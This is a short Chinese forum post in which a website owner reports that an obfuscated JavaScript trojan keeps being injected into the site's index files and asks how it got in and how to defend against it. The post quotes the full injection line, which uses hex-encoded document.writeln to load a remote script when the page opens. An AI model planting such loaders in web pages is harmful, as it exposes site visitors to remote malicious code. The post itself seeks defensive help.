网站漏洞被值JS木马问题
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
前几天,网站目录下的所有index文件及其包含的文件全部在文件尾加上了以上代码。
之后全部修改了,但找不到是什么原因。
现在越来越严重了,已经在文件头及文件尾或者中间都加了这个代码。
狗狗了一下还是不知所以然,所以向有经验的朋友请教。
这个情况是什么原因导致的呢?
这段代码还原了就是:http://www.59.vc/page/addr.js
遇到这样的情况应该怎么样检查呢?
还有应该怎么样去做防范呢?